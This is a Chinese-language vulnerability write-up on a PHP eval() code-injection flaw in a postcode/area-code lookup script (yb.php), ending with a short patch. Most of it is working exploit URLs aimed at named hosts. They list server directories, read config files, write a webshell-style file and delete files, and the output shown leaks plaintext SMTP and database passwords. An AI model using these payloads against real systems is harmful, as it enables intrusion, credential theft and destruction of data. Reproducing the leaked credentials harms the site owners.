站长工具之“邮编区号查询”高危安全漏洞

方法1、服务器上代码检查方法:

在服务器上找到并打开“邮编区号查询”的相关php文件代码(常用文件名为yb.php)如果存在如下代码:
[php]
switch ($_GET['w']){
case "sheng":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[0]\");");break;
case "diqu":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[1]\");");break;
case "shi":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[2]\");");break;
case "cun":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[3]\");");break;
case "youbian":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[4]\");");break;
case "quhao":
@eval("\$found = eregi(\"$keyword[$ai]\",\"$detail[5]\");");break;
default:
@eval("\$found = eregi(\"$keyword[$ai]\",\"$dreamdb[$i]\");");break;
}[/php]

#1打印目录及文件,可修改参数d的值扫描整站

http://tool.51cto.com/yb/yb.php?q=${@exit(print_r(scandir($_GET[d])))}&d=../../../
[php]
Array
(
[0] => .
[1] => ..
[2] => .bash_history
[3] => .bash_logout
[4] => .bash_profile
[5] => .bashrc
[6] => .gnome2
[7] => .mozilla
[8] => .subversion
[9] => .viminfo
[10] => ECL
[11] => admin.0day5.com
[12] => admin.0day5.com.tar
[13] => backup
[14] => biaozhun
[15] => bk
[16] => 0day5.com
[17] => count.0day5.com
[18] => ipatent360
[19] => ipatent360.tar
[20] => keji
[21] => phpmyadmin
[22] => wenshuwenan
[23] => zixunbaogao
)[/php]
#2查看文件,可修改参数d的值查看整站文件

http://tool.0day5.com/yb/yb.php?q=${@exit(print_r(file($_GET[d])))}&d=../../../admin.0day5.com/tool/config.php
[php]

[123] => if( ! defined( 'SMTP_EMAIL_ACTIVE_PASSWORD' ) ) {

[124] => define( 'SMTP_EMAIL_ACTIVE_PASSWORD', 'ecl123456' );

[125] => }

[126] => if( ! defined( 'PAGE_CHARSET' ) ) {

[127] => define( 'PAGE_CHARSET', 'utf-8' );

[128] => }

[129] => /**

[130] => * 统计数据库,连接配置

[131] => * @var

[132] => */

[133] => $GLB_DB_MEMBER_CONFIG = array(

[134] => 'host' => 'localhost',

[135] => 'username' => 'admin',

[136] => 'password' => 'egreen888888',

[137] => 'database' => 'caogenbanquan',

[138] => 'charset' => 'utf8'

[139] => );

[140] => ?>
)[/php]
#3写入传说中的webshell,参数d为内容,n为文件名

利用:
http://tool.0day5.com/yb/yb.php?q=${@exit(var_dump(file_put_contents($_GET[n],$_GET[d])))}&d=by:0day5.com&n=./../1.txt

对应文件地址:
http://tool.0day5.com/1.txt

#4删除文件,参数n为文件名

http://tool.0day5.com//yb/yb.php?q=${@exit(var_dump(unlink($_GET[n])))}&n=./../1.txt

修补方法:
[php]
switch ($_GET['w']){
case "sheng":
$found = eregi($keyword[$ai],$detail[0]);break;
case "diqu":
$found = eregi($keyword[$ai],$detail[1]);break;
case "shi":
$found = eregi($keyword[$ai],$detail[2]);break;
case "cun":
$found = eregi($keyword[$ai],$detail[3]);break;
case "youbian":
$found = eregi($keyword[$ai],$detail[4]);break;
case "quhao":
$found = eregi($keyword[$ai],$detail[5]);break;
default:
$found = eregi($keyword[$ai],$dreamdb[$i]);break;
}[/php]

发表评论